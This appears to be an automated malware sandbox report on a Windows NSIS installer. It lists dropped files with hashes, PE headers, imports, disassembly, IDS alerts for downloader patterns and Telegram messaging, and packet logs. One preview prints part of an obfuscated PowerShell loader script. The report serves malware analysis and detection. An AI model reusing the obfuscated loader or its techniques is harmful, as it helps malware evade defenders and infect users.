                                                                                                                                          Preview:..........SS............hh..-..........99.....rr.K.S.hh..S.........YY..............d..<.G.....YY...&.UU.............FFFFFF........c..@.OOO......^^....8.........FFF................d.....l..........%.;..vv................................................H..ee...........C...44.....B.......x......D............|.o...{....k......................v.......(.(........4..#....RRR........+.....@@@@............66........................................9.9....QQQ...............Y.....................PP.....m................c..X.............MM............---.h..........'........UU.................J.....L..................(..............ZZZZ.......................PPPP.....w.....%.......&&&&.OOOO........C..B..........""............B...bb.......(...........33.77...............y................22.P..........:..........>...............................]............'...EE...h....D........bb..............bbb.......hh......,,,............ooooo.&.S........C.}..........KKKK........6........".....||||..X..........

                                                                                                                                          C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\HVSU7GbA5N.exe
                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (4207), with CRLF, LF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):73908
                                                                                                                                          Entropy (8bit):5.185704234917167
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:GTSeyCEQfJgfhARuSJECSwublNwVAtuB9ZIMJ6qssj6xu1UJjCAYTg8:GTyCCfhku999EB/IIdsARAYc8
                                                                                                                                          MD5:44086E4E4B931EB543DAC505A3A4A2BE
                                                                                                                                          SHA1:9746B2ED0C33673A36AEFCEE2AA8A410DBD5A0F6
                                                                                                                                          SHA-256:3CB5D810D9693DBC418E3E864C4ED8C24D6E674819315166125028ED98EE3CA9
                                                                                                                                          SHA-512:613C00F10F1AD3DF1E56A05C6A770376B6000D04335FA73880C8C91635380EA46382A65E721267A61B98C5F8497F750BC26CEE2F6CB5A6DB42701C7EDD6C2722
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:$Pawnages=$ldervestene;........$Scorpaenid = @'.Myriade.Nadija $BeklageGAcidnesaNonko bdDup,esfiBe.dswonSidebanibrugerpnPhotosyeTa,rega=Hlesspe$SpongelNYngelsooPolemicr ldringe TrephiaMarkedssLaesesgtChronol5 Exantl;Iboende. BronzefErkyndiu MincepnBaldriacChrysort Snoo.wiNondecooDrnrrennD.wedel HelsilkE Fil errSnverhjiPeri argdogsto e Rein arUd okseoAnesthenMicrora Perito( Difflu$InframaA InsemikTaxi,eruBacc.ant S,rankbAntifaseSaucebohOverdefaCabfulsnRundtendObl.gatlVisitoriLedelsenC elydrg FremsteSli kinn Lowlies Tilsig,Detar v$ TogstaANaninaskDenati uKvasetstGaragembRingbareDuevejehPeroxi aSubdepunSkrmudsdChristelDismaliiRenselsnDrontedgStileemeModulscnKnead.nsSp dingfAflytn,sBostnintAfprveiuNeu olomForliggpStraalin Glansri HematonSagesengUnderli) raasaf Un aith{Skatteg.Unco.gr.Uri rro$ FiskebfoutgoneoUdplacerIncumbabLith.firHypo ixuO ernesgSilesi eBrysselrBakkestlEksportoG ssendvbedsoreeAnti ua kiltes( Pe sonUIndecisnHibernafS cionooSloganiu Madstel DepartiPhotolinDo,beltgSesquis

                                                                                                                                          C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\revisualized.pin

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\HVSU7GbA5N.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):161187
                                                                                                                                          Entropy (8bit):1.8904269661652378
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:KY3109OlXCDhowfac81VfCf60Ojh7SPHlfPsH4qnW4K5V09X1m0qOP8e6jBLYD2B:Ks6Oumf2WuInWOg0q0Lt1dlRSr
                                                                                                                                          MD5:01E052DE0376DBAC7B750EC6C0BB3F54
                                                                                                                                          SHA1:893EB9A86D8383DD9E71E669A4A890D676DDB313
                                                                                                                                          SHA-256:F86E826510C473713B3AE14F1EF8AF26A54A1B99E3C7AEE106969EE6BD395B8F
                                                                                                                                          SHA-512:172181AD34B6A851DBE2DD77EF7DB02C12F93B55E1A42EE3BB44971758C482EA078CCEA8B68B079C629A40CA106F427D8DFD62FCE08F9473FDCB796FC9E94C95
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:................b...............^.............G......................................................D...R..........`.....y............................*.................l...........S...............\D....`...............a............................|.................................u............................X...........................O.......;............................h......"......I......^...k.I........m..............................2.....................................X............0............................+............../..................................................t............................\...~.............................z....................J.................................=...+...$.....$......................................................................................&.......j......S..d............a..........>......P..o.....^...........}........................6...........D......................................................a.....k.Q....E....._......I..

                                                                                                                                          C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\skrivestuer.lol

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\HVSU7GbA5N.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):302535
                                                                                                                                          Entropy (8bit):1.8969107180726248
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:BuEWHusZSmrnxGe2N31qRRM5I/2RbpPfvKUO/VRu:BnWHJh3YQRRM51JDL
                                                                                                                                          MD5:EBC7E2200359EDAAE097636129F328C3
                                                                                                                                          SHA1:711F41ED8A676E9CFC8917E984F2C8BF42515DEB
                                                                                                                                          SHA-256:BC6F21CE3CA3EF3966F014CE12132D8B994B31AF20C61033FE02DC3178669DAD
                                                                                                                                          SHA-512:D4872EBF8673A6D6A390EE6FA008AE886C11ECFA322761399EA8E0E1A6CAF15B7CF4D81F103E45D49E550F0260B2213940C4BC07838355FA70BF550786682EA3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.................................................G......................Y.......................................X#...Le........................................................w...4.........X...o................X........._............................B.......@..............................................8..!7............4.................\.......K.......L...........................................q......a................G....................9.......I,.`..................../c~...............j................Z...V:.......F.....A0............x................+..............z................%..........."..................................t...............V....................................6......P.......................8..........^.........................................(.h................1............>.......................................y........@o.......|............l......P.........................g..Y.......b...............+...........J....J..............................+4.....=:..

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):53158
                                                                                                                                          Entropy (8bit):5.062687652912555
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0u4p2prp.bul.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdzwou23.yex.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cliyi2rs.r4x.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibtoah3e.eoi.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                          Entropy (8bit):7.601107319746767
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:HVSU7GbA5N.exe
                                                                                                                                          File size:650'314 bytes
                                                                                                                                          MD5:9eeaa6c9ce625021ac21b5eb40fb73e7
                                                                                                                                          SHA1:459fa22834028579136aebd1327a6ff8b6e654cb
                                                                                                                                          SHA256:6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739
                                                                                                                                          SHA512:202fa2b529565bdf1e2691a12f3b91d5bc6303b5d926852048ed482a071491e8ecf98cc8be5fd1be743a82400db6a57f3ea4cbfd1eeb0586dcd508ba76b4dc50
                                                                                                                                          SSDEEP:12288:lSDeMUQg8x4aKKnpDNsLXfzYoWg4IcQ9y3zf5ju9sis:SeMUQgUlNsvYoWdZtjBu/s
                                                                                                                                          TLSH:F0D41252F480A2E3C9720E32947FD1F2D6EDAC3D85282A877FD837AF1471461D10A56B
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\.U.................\...........0.......p....@

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:05cc948467e6c62c

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x4030b6
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x55C15CDD [Wed Aug 5 00:46:21 2015 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:e160ef8e55bb9d162da4e266afd9eef3

                                                                                                                                          Entrypoint Preview

                                                                                                                                          Instruction
                                                                                                                                          sub esp, 00000184h
                                                                                                                                          push ebx
                                                                                                                                          push ebp
                                                                                                                                          push esi
                                                                                                                                          xor ebx, ebx
                                                                                                                                          push edi
                                                                                                                                          mov dword ptr [esp+18h], ebx
                                                                                                                                          mov dword ptr [esp+10h], 00409190h
                                                                                                                                          mov dword ptr [esp+20h], ebx
                                                                                                                                          mov byte ptr [esp+14h], 00000020h
                                                                                                                                          call dword ptr [00407034h]
                                                                                                                                          push 00008001h
                                                                                                                                          call dword ptr [0040711Ch]
                                                                                                                                          push ebx
                                                                                                                                          call dword ptr [0040728Ch]
                                                                                                                                          push 00000009h
                                                                                                                                          mov dword ptr [00423798h], eax
                                                                                                                                          call 00007F6AF8E5AF32h
                                                                                                                                          mov dword ptr [004236E4h], eax
                                                                                                                                          push ebx
                                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                                          push 00000160h
                                                                                                                                          push eax
                                                                                                                                          push ebx
                                                                                                                                          push 0041EC98h
                                                                                                                                          call dword ptr [00407164h]
                                                                                                                                          push 00409180h
                                                                                                                                          push 00422EE0h
                                                                                                                                          call 00007F6AF8E5ABDCh
                                                                                                                                          call dword ptr [00407120h]
                                                                                                                                          mov ebp, 00429000h
                                                                                                                                          push eax
                                                                                                                                          push ebp
                                                                                                                                          call 00007F6AF8E5ABCAh
                                                                                                                                          push ebx
                                                                                                                                          call dword ptr [00407118h]
                                                                                                                                          cmp byte ptr [00429000h], 00000022h
                                                                                                                                          mov dword ptr [004236E0h], eax
                                                                                                                                          mov eax, ebp
                                                                                                                                          jne 00007F6AF8E5814Ch
                                                                                                                                          mov byte ptr [esp+14h], 00000022h
                                                                                                                                          mov eax, 00429001h
                                                                                                                                          push dword ptr [esp+14h]
                                                                                                                                          push eax
                                                                                                                                          call 00007F6AF8E5A65Ah
                                                                                                                                          push eax
                                                                                                                                          call dword ptr [00407220h]
                                                                                                                                          mov dword ptr [esp+1Ch], eax
                                                                                                                                          jmp 00007F6AF8E58205h
                                                                                                                                          cmp cl, 00000020h
                                                                                                                                          jne 00007F6AF8E58148h
                                                                                                                                          inc eax
                                                                                                                                          cmp byte ptr [eax], 00000020h
                                                                                                                                          je 00007F6AF8E5813Ch

                                                                                                                                          Rich Headers

                                                                                                                                          Programming Language:
                                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                          Data Directories

                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x350000x283c0.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                          Sections

                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000x5ac00x5c00b2645f74b36b1cbbff66d6cf2b9a61fbFalse0.6638077445652174data6.434017891994297IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .rdata0x70000x11ce0x1200640f709ec19b4ed0455a4c64e5934d5eFalse0.4520399305555556OpenPGP Secret Key5.23558258677739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .data0x90000x1a7d80x400135ffaf7e3978322a97c335bc761bdb6False0.609375data4.961292527260562IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .ndata0x240000x110000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rsrc0x350000x283c00x28400ebf946ed8f37400a9a59d22eec6a4b01False0.5164741847826086data5.585975534863303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                          Resources

                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_ICON0x353580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.4569975156749083
                                                                                                                                          RT_ICON0x45b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5434885431994955
                                                                                                                                          RT_ICON0x4f0280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.56728280961183
                                                                                                                                          RT_ICON0x544b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.540800661313179
                                                                                                                                          RT_ICON0x586d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6162863070539419
                                                                                                                                          RT_ICON0x5ac800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6226547842401501
                                                                                                                                          RT_ICON0x5bd280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6967213114754098
                                                                                                                                          RT_ICON0x5c6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7375886524822695
                                                                                                                                          RT_DIALOG0x5cb180x100dataEnglishUnited States0.5234375
                                                                                                                                          RT_DIALOG0x5cc180x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                          RT_DIALOG0x5cd380xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                          RT_DIALOG0x5ce000x60dataEnglishUnited States0.7291666666666666
                                                                                                                                          RT_GROUP_ICON0x5ce600x76dataEnglishUnited States0.7457627118644068
                                                                                                                                          RT_VERSION0x5ced80x1a8dataEnglishUnited States0.5165094339622641
                                                                                                                                          RT_MANIFEST0x5d0800x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447

                                                                                                                                          Imports

                                                                                                                                          DLLImport
                                                                                                                                          KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                                                                                                                          USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                                          ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                          ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                                          Possible Origin

                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States

                                                                                                                                          Network Behavior

                                                                                                                                          Suricata IDS Alerts

                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2025-01-08T16:21:18.656695+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849709142.250.184.238443TCP
                                                                                                                                          2025-01-08T16:21:23.621820+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711132.226.8.16980TCP
                                                                                                                                          2025-01-08T16:21:24.809363+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711132.226.8.16980TCP
                                                                                                                                          2025-01-08T16:21:25.392730+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849713188.114.97.3443TCP
                                                                                                                                          2025-01-08T16:21:26.293753+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849714132.226.8.16980TCP
                                                                                                                                          2025-01-08T16:21:28.012490+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849716132.226.8.16980TCP
                                                                                                                                          2025-01-08T16:21:30.188459+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849719188.114.97.3443TCP
                                                                                                                                          2025-01-08T16:21:36.997539+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.849728149.154.167.220443TCP

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 8, 2025 16:21:17.622142076 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:17.622179031 CET44349709142.250.184.238192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:17.622298956 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:17.646064043 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:17.646085024 CET44349709142.250.184.238192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.279895067 CET44349709142.250.184.238192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.279989004 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:18.280678034 CET44349709142.250.184.238192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.280776978 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:18.341094017 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:18.341115952 CET44349709142.250.184.238192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.341504097 CET44349709142.250.184.238192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.341571093 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:18.348445892 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:18.391343117 CET44349709142.250.184.238192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.656688929 CET44349709142.250.184.238192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.656774044 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:18.656790018 CET44349709142.250.184.238192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.656835079 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:18.656951904 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:18.656992912 CET44349709142.250.184.238192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.657046080 CET49709443192.168.2.8142.250.184.238
                                                                                                                                          Jan 8, 2025 16:21:18.685113907 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:18.685129881 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.685184956 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:18.685548067 CET49710443192.168.2.8142.250.181.225
